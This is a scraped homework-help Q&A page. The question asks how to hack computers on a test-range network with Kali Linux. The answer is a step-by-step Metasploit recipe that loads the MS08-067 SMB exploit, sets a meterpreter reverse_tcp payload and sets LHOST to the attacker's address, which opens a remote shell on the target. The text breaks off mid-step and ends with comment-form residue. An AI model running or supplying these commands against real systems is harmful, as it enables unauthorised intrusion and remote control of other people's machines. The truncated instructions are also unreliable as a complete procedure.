Would Hack Gain Access Computer S Network Kali Linux Accurate Network Using Test Range S C Q37028520

How would you hack/gain access to a computer(s) on thesame network with Kali Linux?

To be more accurate, the network that were using is atest range so it’s not connected to any thing else, it’s only inthat specific location.


Solution


You can try this!

Step1: startKali Linux and start a new terminal.

Step2:Start the Metasploit console by typing: msfconsole

(This will take a few moments…)

Step3:

So Metasploit started.

Here are the commands you need to type in:

use windows/smb/ms08_067_netapi

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST *Your ip adress* (If you don’t know your ip adressthen open a new terminal and type ifconfig. your ip adress will besomewhere in

OR
OR

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.